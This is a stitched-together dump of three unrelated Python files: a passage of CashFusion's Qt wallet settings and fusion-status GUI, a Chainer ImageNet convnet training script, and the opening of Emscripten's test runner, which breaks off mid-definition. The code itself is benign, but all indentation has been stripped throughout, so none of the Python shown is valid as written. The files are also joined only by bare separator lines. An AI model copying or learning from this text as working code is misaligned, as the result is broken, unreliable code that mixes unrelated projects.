self.plugin.set_torport('auto' if state else 'manual')
port = self.plugin.get_torport()
if port is not None:
self.le_tor_port.setText(str(port))
self.torscanthread_ping.set()
self.update_tor()
def refresh(self):
self.update_server()
self.update_tor()
self.update_server_widget_visibility()
self.update_server_error()
def update_server_widget_visibility(self):
if not self.server_widget.is_server_running():
self.server_widget.setHidden(True)
self.layout().setStretch(self.stretch_item_index, 1)
self.layout().setStretch(self.server_widget_index, 0)
else:
self.server_widget.setHidden(False)
self.layout().setStretch(self.stretch_item_index, 0)
self.layout().setStretch(self.server_widget_index, 1)
def showEvent(self, event):
super().showEvent(event)
if not event.isAccepted():
return
self.refresh()
self.timer_server_widget_visibility.start(2000)
if self.torscanthread is None:
self.torscanthread = threading.Thread(name='Fusion-scan_torport_settings', target=self.scan_torport_loop)
self.torscanthread.daemon = True
self.torscanthread_stopping = False
self.torscanthread.start()
def _hide_close_common(self):
self.timer_server_widget_visibility.stop()
self.torscanthread_stopping = True
self.torscanthread_ping.set()
self.torscanthread = None
def closeEvent(self, event):
super().closeEvent(event)
if not event.isAccepted():
return
self._hide_close_common()
def hideEvent(self, event):
super().hideEvent(event)
if not event.isAccepted():
return
self._hide_close_common()
def scan_torport_loop(self, ):
while not self.torscanthread_stopping:
goodport = self.plugin.scan_torport()
self.torscanthread_update.emit(goodport)
self.torscanthread_ping.wait(10)
self.torscanthread_ping.clear()
class WalletSettingsDialog(WindowModalDialog):
def __init__(self, parent, plugin, wallet):
super().__init__(parent=parent, title=_("CashFusion - Wallet Settings"))
self.setWindowIcon(icon_fusion_logo)
self.plugin = plugin
self.wallet = wallet
self.conf = Conf(self.wallet)
self.idx2confkey = dict() # int -> 'normal', 'consolidate', etc..
self.confkey2idx = dict() # str 'normal', 'consolidate', etc -> int
assert not hasattr(self.wallet, '_cashfusion_settings_window')
main_window = self.wallet.weak_window()
assert main_window
self.wallet._cashfusion_settings_window = self
main_layout = QVBoxLayout(self)
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Fusion mode:')))
self.mode_cb = mode_cb = QComboBox()
hbox.addWidget(mode_cb)
main_layout.addLayout(hbox)
self.gb_coinbase = gb = QGroupBox(_("Coinbase Coins"))
vbox = QVBoxLayout(gb)
self.cb_coinbase = QCheckBox(_('Auto-fuse coinbase coins (if mature)'))
self.cb_coinbase.clicked.connect(self._on_cb_coinbase)
vbox.addWidget(self.cb_coinbase)
# The coinbase-related group box is hidden by default. It becomes
# visible permanently when the wallet settings dialog has seen at least
# one coinbase coin, indicating a miner's wallet. For most users the
# coinbase checkbox is confusing, which is why we prefer to hide it.
gb.setHidden(True)
main_layout.addWidget(gb)
box = QGroupBox(_("Self-Fusing"))
main_layout.addWidget(box)
slayout = QVBoxLayout(box)
lbl = QLabel(_("Allow this wallet to participate multiply in the same fusion round?"))
lbl.setWordWrap(True)
slayout.addWidget(lbl)
box = QHBoxLayout(); box.setContentsMargins(0,0,0,0)
self.combo_self_fuse = QComboBox()
self.combo_self_fuse.addItem(_('No'), 1)
self.combo_self_fuse.addItem(_('Yes - as up to two players'), 2)
box.addStretch(1)
box.addWidget(self.combo_self_fuse)
slayout.addLayout(box) ; del box
self.combo_self_fuse.activated.connect(self.chose_self_fuse)
self.stacked_layout = stacked_layout = QStackedLayout()
main_layout.addLayout(stacked_layout)
# Stacked Layout pages ...
# Normal
normal_page_w = QWidget()
normal_page_layout = QVBoxLayout(normal_page_w)
self.confkey2idx['normal'] = stacked_layout.addWidget(normal_page_w)
mode_cb.addItem(_('Normal'))
lbl = QLabel("- " + _("Normal mode") + " -")
lbl.setAlignment(Qt.AlignCenter)
normal_page_layout.addWidget(lbl)
# Consolidate
consolidate_page_w = QWidget()
consolidate_page_layout = QVBoxLayout(consolidate_page_w)
self.confkey2idx['consolidate'] = stacked_layout.addWidget(consolidate_page_w)
mode_cb.addItem(_('Consolidate'))
lbl = QLabel("- " + _("Consolidation mode") + " -")
lbl.setAlignment(Qt.AlignCenter)
consolidate_page_layout.addWidget(lbl)
# Fan-out
fanout_page_w = QWidget()
fanout_page_layout = QVBoxLayout(fanout_page_w)
self.confkey2idx['fan-out'] = stacked_layout.addWidget(fanout_page_w)
mode_cb.addItem(_('Fan-out'))
lbl = QLabel("- " + _("Fan-out mode") + " -")
lbl.setAlignment(Qt.AlignCenter)
fanout_page_layout.addWidget(lbl)
# Custom
self.custom_page_w = custom_page_w = QWidget()
custom_page_layout = QVBoxLayout(custom_page_w)
custom_page_layout.setContentsMargins(0,0,0,0)
self.confkey2idx['custom'] = stacked_layout.addWidget(custom_page_w)
mode_cb.addItem(_('Custom'))
mode_cb.currentIndexChanged.connect(self._on_mode_changed) # intentionally connected after all items already added
box = QGroupBox(_("Auto-Fusion Coin Selection")) ; custom_page_layout.addWidget(box)
slayout = QVBoxLayout(box)
grid = QGridLayout() ; slayout.addLayout(grid)
self.radio_select_size = QRadioButton(_("Target typical output amount"))
grid.addWidget(self.radio_select_size, 0, 0)
self.radio_select_fraction = QRadioButton(_("Per-coin random chance"))
grid.addWidget(self.radio_select_fraction, 1, 0)
self.radio_select_count = QRadioButton(_("Target number of coins in wallet"))
grid.addWidget(self.radio_select_count, 2, 0)
self.radio_select_size.clicked.connect(self.edited_size)
self.radio_select_fraction.clicked.connect(self.edited_fraction)
self.radio_select_count.clicked.connect(self.edited_count)
self.amt_selector_size = BTCAmountEdit(main_window.get_decimal_point)
grid.addWidget(self.amt_selector_size, 0, 1)
self.sb_selector_fraction = QDoubleSpinBox()
self.sb_selector_fraction.setRange(0.1, 100.)
self.sb_selector_fraction.setSuffix("%")
self.sb_selector_fraction.setDecimals(1)
grid.addWidget(self.sb_selector_fraction, 1, 1)
self.sb_selector_count = QSpinBox()
self.sb_selector_count.setRange(COIN_FRACTION_FUDGE_FACTOR, 9999) # Somewhat hardcoded limit of 9999 is arbitrary, have this come from constants?
grid.addWidget(self.sb_selector_count, 2, 1)
self.amt_selector_size.editingFinished.connect(self.edited_size)
self.sb_selector_fraction.valueChanged.connect(self.edited_fraction)
self.sb_selector_count.valueChanged.connect(self.edited_count)
# Clicking the radio button should bring its corresponding widget buddy into focus
self.radio_select_size.clicked.connect(self.amt_selector_size.setFocus)
self.radio_select_fraction.clicked.connect(self.sb_selector_fraction.setFocus)
self.radio_select_count.clicked.connect(self.sb_selector_count.setFocus)
low_warn_blurb = _("Are you trying to consolidate?")
low_warn_tooltip = _("Click for consolidation tips")
low_warn_blurb_link = '<a href="unused">' + low_warn_blurb + '</a>'
self.l_warn_selection = QLabel("<center>" + low_warn_blurb_link + "</center>")
self.l_warn_selection.setToolTip(low_warn_tooltip)
self.l_warn_selection.linkActivated.connect(self._show_low_warn_help)
self.l_warn_selection.setAlignment(Qt.AlignJustify|Qt.AlignVCenter)
qs = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
qs.setRetainSizeWhenHidden(True)
self.l_warn_selection.setSizePolicy(qs)
slayout.addWidget(self.l_warn_selection)
slayout.setAlignment(self.l_warn_selection, Qt.AlignCenter)
box = QGroupBox(_("Auto-Fusion Limits")) ; custom_page_layout.addWidget(box)
slayout = QVBoxLayout(box)
grid = QGridLayout() ; slayout.addLayout(grid)
grid.addWidget(QLabel(_("Number of queued fusions")), 0, 0)
self.sb_queued_autofuse = QSpinBox()
self.sb_queued_autofuse.setRange(1, 10) # hard-coded rande 1-10, maybe have this come from some constants?
self.sb_queued_autofuse.setMinimumWidth(50) # just so it doesn't end up too tiny
grid.addWidget(self.sb_queued_autofuse, 0, 1)
self.cb_autofuse_only_all_confirmed = QCheckBox(_("Only auto-fuse when all coins are confirmed"))
slayout.addWidget(self.cb_autofuse_only_all_confirmed)
grid.addWidget(QWidget(), 0, 2); grid.setColumnStretch(2, 1) # spacer
self.sb_queued_autofuse.valueChanged.connect(self.edited_queued_autofuse)
self.cb_autofuse_only_all_confirmed.clicked.connect(self.clicked_confirmed_only)
# / end pages
cbut = CloseButton(self)
main_layout.addLayout(Buttons(cbut))
cbut.setDefault(False)
cbut.setAutoDefault(False)
self.idx2confkey = inv_dict(self.confkey2idx) # This must be set-up before this function returns
# We do this here in addition to in showEvent because on some platforms
# (such as macOS), the window animates-in before refreshing properly and
# then it refreshes, leading to a jumpy glitch. If we do this, it
# slides-in already looking as it should.
self.refresh()
def _show_low_warn_help(self):
low_warn_message = (
_("If you wish to consolidate coins:")
+ "<ul>"
+ "<li>" + _("Specify a maximum of 1 queued fusion")
+ "<li>" + _("Set 'self-fusing' to 'No'")
+ "<li>" + _("Check the 'only when all coins are confirmed' checkbox")
+ "</ul>"
+ _("If you do not wish to necessarily consolidate coins, then it's"
" perfectly acceptable to ignore this tip.")
)
self.show_message(low_warn_message, title=_('Help'), rich_text=True)
def _on_mode_changed(self, idx : int):
self.conf.fusion_mode = self.idx2confkey[idx] # will raise on bad idx, which indicates programming error.
self.refresh()
def _on_cb_coinbase(self, checked : bool):
self.conf.autofuse_coinbase = checked
self.refresh()
def _maybe_switch_page(self):
mode = self.conf.fusion_mode
oldidx = self.stacked_layout.currentIndex()
try:
idx = self.confkey2idx[mode]
idx_custom = self.confkey2idx['custom']
# The below conditional ensures that the custom page always
# disappears from the layout if not selected. We do this because it
# is rather large and makes this window unnecessarily big. Note this
# only works if the 'custom' page is last.. otherwise bad things
# happen!
assert idx_custom == max(self.confkey2idx.values()) # ensures custom is last page otherwise this code breaks
if idx == idx_custom:
if not self.stacked_layout.itemAt(idx_custom):
self.stacked_layout.insertWidget(idx_custom, self.custom_page_w)
elif self.stacked_layout.count()-1 == idx_custom:
self.stacked_layout.takeAt(idx_custom)
self.stacked_layout.setCurrentIndex(idx)
self.mode_cb.setCurrentIndex(idx)
except KeyError as e:
# should never happen because settings object filters out unknown modes
raise RuntimeError(f"INTERNAL ERROR: Unknown fusion mode: '{mode}'") from e
self.updateGeometry()
self.resize(self.sizeHint())
return idx == idx_custom
def refresh(self):
eligible, ineligible, sum_value, has_unconfirmed, has_coinbase = select_coins(self.wallet)
select_type, select_amount = self.conf.selector
edit_widgets = [self.amt_selector_size, self.sb_selector_fraction, self.sb_selector_count, self.sb_queued_autofuse,
self.cb_autofuse_only_all_confirmed, self.combo_self_fuse, self.stacked_layout, self.mode_cb,
self.cb_coinbase]
try:
for w in edit_widgets:
# Block spurious editingFinished signals and valueChanged signals as
# we modify the state and focus of widgets programatically below.
# On macOS not doing this led to a very strange/spazzy UI.
w.blockSignals(True)
self.cb_coinbase.setChecked(self.conf.autofuse_coinbase)
if not self.gb_coinbase.isVisible():
cb_latch = self.conf.coinbase_seen_latch
if cb_latch or self.cb_coinbase.isChecked() or has_coinbase:
if not cb_latch:
# Once latched to true, this UI element will forever be
# visible for this wallet. It means the wallet is a miner's
# wallet and they care about coinbase coins.
self.conf.coinbase_seen_latch = True
self.gb_coinbase.setHidden(False)
del cb_latch
is_custom_page = self._maybe_switch_page()
idx = 0
if self.conf.self_fuse_players > 1:
idx = 1
self.combo_self_fuse.setCurrentIndex(idx)
del idx
if is_custom_page:
self.amt_selector_size.setEnabled(select_type == 'size')
self.sb_selector_count.setEnabled(select_type == 'count')
self.sb_selector_fraction.setEnabled(select_type == 'fraction')
if select_type == 'size':
self.radio_select_size.setChecked(True)
sel_size = select_amount
if sum_value > 0:
sel_fraction = min(COIN_FRACTION_FUDGE_FACTOR * select_amount / sum_value, 1.)
else:
sel_fraction = 1.
elif select_type == 'count':
self.radio_select_count.setChecked(True)
sel_size = max(sum_value / max(select_amount, 1), 10000)
sel_fraction = COIN_FRACTION_FUDGE_FACTOR / max(select_amount, 1)
elif select_type == 'fraction':
self.radio_select_fraction.setChecked(True)
sel_size = max(sum_value * select_amount / COIN_FRACTION_FUDGE_FACTOR, 10000)
sel_fraction = select_amount
else:
self.conf.selector = None
return self.refresh()
sel_count = COIN_FRACTION_FUDGE_FACTOR / max(sel_fraction, 0.001)
self.amt_selector_size.setAmount(round(sel_size))
self.sb_selector_fraction.setValue(max(min(sel_fraction, 1.0), 0.001) * 100.0)
self.sb_selector_count.setValue(sel_count)
try: self.sb_queued_autofuse.setValue(self.conf.queued_autofuse)
except (TypeError, ValueError): pass # should never happen but paranoia pays off in the long-term
conf_only = self.conf.autofuse_confirmed_only
self.cb_autofuse_only_all_confirmed.setChecked(conf_only)
self.l_warn_selection.setVisible(sel_fraction > 0.2 and (not conf_only or self.sb_queued_autofuse.value() > 1))
finally:
# re-enable signals
for w in edit_widgets: w.blockSignals(False)
def edited_size(self,):
size = self.amt_selector_size.get_amount()
if size is None or size < 10000:
size = 10000
self.conf.selector = ('size', size)
self.refresh()
def edited_fraction(self,):
fraction = max(self.sb_selector_fraction.value() / 100., 0.0)
self.conf.selector = ('fraction', round(fraction, 3))
self.refresh()
def edited_count(self,):
count = self.sb_selector_count.value()
self.conf.selector = ('count', count)
self.refresh()
def edited_queued_autofuse(self,):
prevval = self.conf.queued_autofuse
numfuse = self.sb_queued_autofuse.value()
self.conf.queued_autofuse = numfuse
if prevval > numfuse:
for f in list(self.wallet._fusions_auto):
f.stop('User decreased queued-fuse limit', not_if_running = True)
self.refresh()
def clicked_confirmed_only(self, checked):
self.conf.autofuse_confirmed_only = checked
self.refresh()
def chose_self_fuse(self,):
sel = self.combo_self_fuse.currentData()
oldsel = self.conf.self_fuse_players
if oldsel != sel:
self.conf.self_fuse_players = sel
for f in self.wallet._fusions:
# we have to stop waiting fusions since the tags won't overlap.
# otherwise, the user will end up self fusing way too much.
f.stop('User changed self-fuse limit', not_if_running = True)
self.refresh()
def closeEvent(self, event):
super().closeEvent(event)
if event.isAccepted():
self.setParent(None)
del self.wallet._cashfusion_settings_window
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted():
self.refresh()
class ServerFusionsBaseMixin:
def __init__(self, plugin, refresh_interval=2000):
assert isinstance(self, QWidget)
self.plugin = plugin
self.refresh_interval = refresh_interval
self.timer_refresh = QTimer(self)
self.timer_refresh.setSingleShot(False)
self.timer_refresh.timeout.connect(self.refresh)
def _on_show(self):
self.timer_refresh.start(self.refresh_interval)
self.refresh()
def _on_hide(self):
self.timer_refresh.stop()
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted():
self._on_show()
def hideEvent(self, event):
super().hideEvent(event)
if event.isAccepted():
self._on_hide()
def closeEvent(self, event):
super().closeEvent(event)
if event.isAccepted():
self._on_hide()
def refresh(self):
raise NotImplementedError('ServerFusionsBaseMixin refresh() needs an implementation')
class ServerWidget(ServerFusionsBaseMixin, QWidget):
def __init__(self, plugin, parent=None):
QWidget.__init__(self, parent)
ServerFusionsBaseMixin.__init__(self, plugin)
main_layout = QVBoxLayout(self)
self.serverbox = QGroupBox(_("Server"))
main_layout.addWidget(self.serverbox)
#self.serverbox.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
slayout = QVBoxLayout(self.serverbox)
self.l_server_status = QLabel()
slayout.addWidget(self.l_server_status)
self.t_server_waiting = QTableWidget()
self.t_server_waiting.setColumnCount(3)
self.t_server_waiting.setRowCount(len(Params.tiers))
self.t_server_waiting.setHorizontalHeaderLabels([_('Tier (sats)'), _('Num players'), ''])
for i, t in enumerate(Params.tiers):
button = QPushButton(_("Start"))
button.setDefault(False); button.setAutoDefault(False) # on some platforms if we don't do this, one of the buttons traps "Enter" key
button.clicked.connect(partial(self.clicked_start_fuse, t))
self.t_server_waiting.setCellWidget(i, 2, button)
slayout.addWidget(self.t_server_waiting)
def sizeHint(self):
return QSize(300, 150)
def refresh(self):
if self.is_server_running():
self.t_server_waiting.setEnabled(True)
self.l_server_status.setText(_('Server status: ACTIVE') + f' {self.plugin.fusion_server.host}:{self.plugin.fusion_server.port}')
table = self.t_server_waiting
table.setRowCount(len(self.plugin.fusion_server.waiting_pools))
for i,(t,pool) in enumerate(self.plugin.fusion_server.waiting_pools.items()):
table.setItem(i,0,QTableWidgetItem(str(t)))
table.setItem(i,1,QTableWidgetItem(str(len(pool.pool))))
else:
self.t_server_waiting.setEnabled(False)
self.l_server_status.setText(_('Server status: NOT RUNNING'))
def is_server_running(self):
return bool(self.plugin.fusion_server)
def clicked_start_fuse(self, tier, event):
if self.plugin.fusion_server is None:
return
self.plugin.fusion_server.start_fuse(tier)
class FusionsWindow(ServerFusionsBaseMixin, QDialog):
def __init__(self, plugin):
QDialog.__init__(self, parent=None)
ServerFusionsBaseMixin.__init__(self, plugin, refresh_interval=1000)
self.setWindowTitle(_("CashFusion - Fusions"))
self.setWindowIcon(icon_fusion_logo)
main_layout = QVBoxLayout(self)
clientbox = QGroupBox(_("Fusions"))
main_layout.addWidget(clientbox)
clayout = QVBoxLayout(clientbox)
self.t_active_fusions = QTreeWidget()
self.t_active_fusions.setHeaderLabels([_('Wallet'), _('Status'), _('Status Extra')])
self.t_active_fusions.setContextMenuPolicy(Qt.CustomContextMenu)
self.t_active_fusions.customContextMenuRequested.connect(self.create_menu_active_fusions)
self.t_active_fusions.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.t_active_fusions.itemDoubleClicked.connect(self.on_double_clicked)
clayout.addWidget(self.t_active_fusions)
self.resize(520, 240) # TODO: Have this somehow not be hard-coded
def refresh(self):
tree = self.t_active_fusions
reselect_fusions = set(i.data(0, Qt.UserRole)() for i in tree.selectedItems())
reselect_fusions.discard(None)
reselect_items = []
tree.clear()
for fusion in reversed(self.plugin.get_all_fusions()):
wname = fusion.target_wallet.diagnostic_name()
status, status_ext = fusion.status
item = QTreeWidgetItem( [ wname, status, status_ext] )
item.setToolTip(0, wname) # this doesn't always fit in the column
item.setToolTip(2, status_ext or '') # neither does this
item.setData(0, Qt.UserRole, weakref.ref(fusion))
if fusion in reselect_fusions:
reselect_items.append(item)
tree.addTopLevelItem(item)
for item in reselect_items:
item.setSelected(True)
def create_menu_active_fusions(self, position):
selected = self.t_active_fusions.selectedItems()
if not selected:
return
fusions = set(i.data(0, Qt.UserRole)() for i in selected)
fusions.discard(None)
statuses = set(f.status[0] for f in fusions)
selection_of_1_fusion = list(fusions)[0] if len(fusions) == 1 else None
has_live = 'running' in statuses or 'waiting' in statuses
menu = QMenu()
def cancel():
for fusion in fusions:
fusion.stop(_('Stop requested by user'))
if has_live:
if 'running' in statuses:
msg = _('Cancel (at end of round)')
else:
msg = _('Cancel')
menu.addAction(msg, cancel)
if selection_of_1_fusion and selection_of_1_fusion.txid:
menu.addAction(_("View Tx..."), lambda: self._open_tx_for_fusion(selection_of_1_fusion))
if not menu.isEmpty():
menu.exec_(self.t_active_fusions.viewport().mapToGlobal(position))
def on_double_clicked(self, item, column):
self._open_tx_for_fusion( item.data(0, Qt.UserRole)() )
def _open_tx_for_fusion(self, fusion):
if not fusion or not fusion.txid or not fusion.target_wallet:
return
wallet = fusion.target_wallet
window = wallet.weak_window and wallet.weak_window()
txid = fusion.txid
if window:
tx = window.wallet.transactions.get(txid)
if tx:
window.show_transaction(tx, wallet.get_label(txid))
else:
window.show_error(_("Transaction not yet in wallet"))
|
train_imagenet.py
|
#!/usr/bin/env python
"""Example code of learning a large scale convnet from ILSVRC2012 dataset.
Prerequisite: To run this example, crop the center of ILSVRC2012 training and
validation images and scale them to 256x256, and make two lists of space-
separated CSV whose first column is full path to image and second column is
zero-origin label (this format is same as that used by Caffe's ImageDataLayer).
"""
from __future__ import print_function
import argparse
import datetime
import json
import multiprocessing
import random
import sys
import threading
import time
import numpy as np
from PIL import Image
import six
import six.moves.cPickle as pickle
from six.moves import queue
from chainer import computational_graph as c
from chainer import cuda
from chainer import optimizers
parser = argparse.ArgumentParser(
description='Learning convnet from ILSVRC2012 dataset')
parser.add_argument('train', help='Path to training image-label list file')
parser.add_argument('val', help='Path to validation image-label list file')
parser.add_argument('--mean', '-m', default='mean.npy',
help='Path to the mean file (computed by compute_mean.py)')
parser.add_argument('--arch', '-a', default='nin',
help='Convnet architecture \
(nin, alexbn, googlenet, googlenetbn)')
parser.add_argument('--batchsize', '-B', type=int, default=32,
help='Learning minibatch size')
parser.add_argument('--val_batchsize', '-b', type=int, default=250,
help='Validation minibatch size')
parser.add_argument('--epoch', '-E', default=10, type=int,
help='Number of epochs to learn')
parser.add_argument('--gpu', '-g', default=-1, type=int,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--loaderjob', '-j', default=20, type=int,
help='Number of parallel data loading processes')
parser.add_argument('--out', '-o', default='model',
help='Path to save model on each validation')
args = parser.parse_args()
assert 50000 % args.val_batchsize == 0
# Prepare dataset
def load_image_list(path):
tuples = []
for line in open(path):
pair = line.strip().split()
tuples.append((pair[0], np.int32(pair[1])))
return tuples
train_list = load_image_list(args.train)
val_list = load_image_list(args.val)
mean_image = pickle.load(open(args.mean, 'rb'))
# Prepare model
if args.arch == 'nin':
import nin
model = nin.NIN()
elif args.arch == 'alexbn':
import alexbn
model = alexbn.AlexBN()
elif args.arch == 'googlenet':
import googlenet
model = googlenet.GoogLeNet()
elif args.arch == 'googlenetbn':
import googlenetbn
model = googlenetbn.GoogLeNetBN()
else:
raise ValueError('Invalid architecture name')
if args.gpu >= 0:
cuda.init(args.gpu)
model.to_gpu()
# Setup optimizer
optimizer = optimizers.MomentumSGD(lr=0.01, momentum=0.9)
optimizer.setup(model.collect_parameters())
# ------------------------------------------------------------------------------
# This example consists of three threads: data feeder, logger and trainer.
# These communicate with each other via Queue.
data_q = queue.Queue(maxsize=1)
res_q = queue.Queue()
# Data loading routine
cropwidth = 256 - model.insize
def read_image(path, center=False, flip=False):
image = np.asarray(Image.open(path)).transpose(2, 0, 1)
if center:
top = left = cropwidth / 2
else:
top = random.randint(0, cropwidth - 1)
left = random.randint(0, cropwidth - 1)
bottom = model.insize + top
right = model.insize + left
image = image[:, top:bottom, left:right].astype(np.float32)
image -= mean_image[:, top:bottom, left:right]
image /= 255
if flip and random.randint(0, 1) == 0:
return image[:, :, ::-1]
else:
return image
# Data feeder
epoch_count=0
def feed_data():
global epoch_count
i = 0
count = 0
x_batch = np.ndarray(
(args.batchsize, 3, model.insize, model.insize), dtype=np.float32)
y_batch = np.ndarray((args.batchsize,), dtype=np.int32)
val_x_batch = np.ndarray(
(args.val_batchsize, 3, model.insize, model.insize), dtype=np.float32)
val_y_batch = np.ndarray((args.val_batchsize,), dtype=np.int32)
batch_pool = [None] * args.batchsize
val_batch_pool = [None] * args.val_batchsize
pool = multiprocessing.Pool(args.loaderjob)
data_q.put('train')
for epoch in six.moves.range(1, 1 + args.epoch):
epoch_count=epoch
print('epoch', epoch, file=sys.stderr)
print('learning rate', optimizer.lr, file=sys.stderr)
perm = np.random.permutation(len(train_list))
for idx in perm:
path, label = train_list[idx]
batch_pool[i] = pool.apply_async(read_image, (path, False, True))
y_batch[i] = label
i += 1
if i == args.batchsize:
for j, x in enumerate(batch_pool):
x_batch[j] = x.get()
data_q.put((x_batch.copy(), y_batch.copy()))
i = 0
count += 1
if count % 100000 == 0:
data_q.put('val')
j = 0
for path, label in val_list:
val_batch_pool[j] = pool.apply_async(
read_image, (path, True, False))
val_y_batch[j] = label
j += 1
if j == args.val_batchsize:
for k, x in enumerate(val_batch_pool):
val_x_batch[k] = x.get()
data_q.put((val_x_batch.copy(), val_y_batch.copy()))
j = 0
data_q.put('train')
optimizer.lr *= 0.97
pool.close()
pool.join()
data_q.put('end')
# Logger
def log_result():
train_count = 0
train_cur_loss = 0
train_cur_accuracy = 0
begin_at = time.time()
val_begin_at = None
while True:
result = res_q.get()
if result == 'end':
print(file=sys.stderr)
break
elif result == 'train':
print(file=sys.stderr)
train = True
if val_begin_at is not None:
begin_at += time.time() - val_begin_at
val_begin_at = None
continue
elif result == 'val':
print(file=sys.stderr)
train = False
val_count = val_loss = val_accuracy = 0
val_begin_at = time.time()
continue
loss, accuracy = result
if train:
train_count += 1
duration = time.time() - begin_at
throughput = train_count * args.batchsize / duration
sys.stderr.write(
'\rtrain {} updates ({} samples) time: {} ({} images/sec)'
.format(train_count, train_count * args.batchsize,
datetime.timedelta(seconds=duration), throughput))
train_cur_loss += loss
train_cur_accuracy += accuracy
if train_count % 10 == 0:
mean_loss = train_cur_loss / 10
mean_error = 1 - train_cur_accuracy / 10
print(file=sys.stderr)
print(json.dumps({'type': 'train', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
train_cur_loss = 0
train_cur_accuracy = 0
else:
val_count += args.val_batchsize
duration = time.time() - val_begin_at
throughput = val_count / duration
sys.stderr.write(
'\rval {} batches ({} samples) time: {} ({} images/sec)'
.format(val_count / args.val_batchsize, val_count,
datetime.timedelta(seconds=duration), throughput))
val_loss += loss
val_accuracy += accuracy
if val_count == 50000:
mean_loss = val_loss * args.val_batchsize / 50000
mean_error = 1 - val_accuracy * args.val_batchsize / 50000
print(file=sys.stderr)
print(json.dumps({'type': 'val', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
# Trainer
def train_loop():
graph_generated = False
while True:
while data_q.empty():
time.sleep(0.1)
inp = data_q.get()
if inp == 'end': # quit
res_q.put('end')
break
elif inp == 'train': # restart training
res_q.put('train')
train = True
continue
elif inp == 'val': # start validation
res_q.put('val')
train = False
continue
x, y = inp
if args.gpu >= 0:
x = cuda.to_gpu(x)
y = cuda.to_gpu(y)
if train:
optimizer.zero_grads()
loss, accuracy = model.forward(x, y)
loss.backward()
optimizer.update()
if not graph_generated:
with open('graph.dot', 'w') as o:
o.write(c.build_computational_graph((loss,), False).dump())
with open('graph.wo_split.dot', 'w') as o:
o.write(c.build_computational_graph((loss,), True).dump())
print('generated graph')
graph_generated = True
else:
loss, accuracy = model.forward(x, y, train=False)
pickle.dump(model, open('model%04d'%epoch_count, 'wb'), -1)
res_q.put((float(cuda.to_cpu(loss.data)),
float(cuda.to_cpu(accuracy.data))))
del loss, accuracy, x, y
# Invoke threads
feeder = threading.Thread(target=feed_data)
feeder.daemon = True
feeder.start()
logger = threading.Thread(target=log_result)
logger.daemon = True
logger.start()
train_loop()
feeder.join()
logger.join()
# Save final model
pickle.dump(model, open('model', 'wb'), -1)
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import re
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote, unquote_plus
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import parallel_runner
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, DEBUG, PYTHON, LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR, WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS, EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, Building, run_process, try_delete, to_cc, asbytes, safe_copy, Settings
from tools import jsrun, shared, line_endings
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# Also suppot the old name: EM_SAVE_DIR
EMTEST_SAVE_DIR = os.getenv('EMTEST_SAVE_DIR', os.getenv('EM_SAVE_DIR'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def no_asmjs(note=''):
assert not callable(note)
def decorated(f):
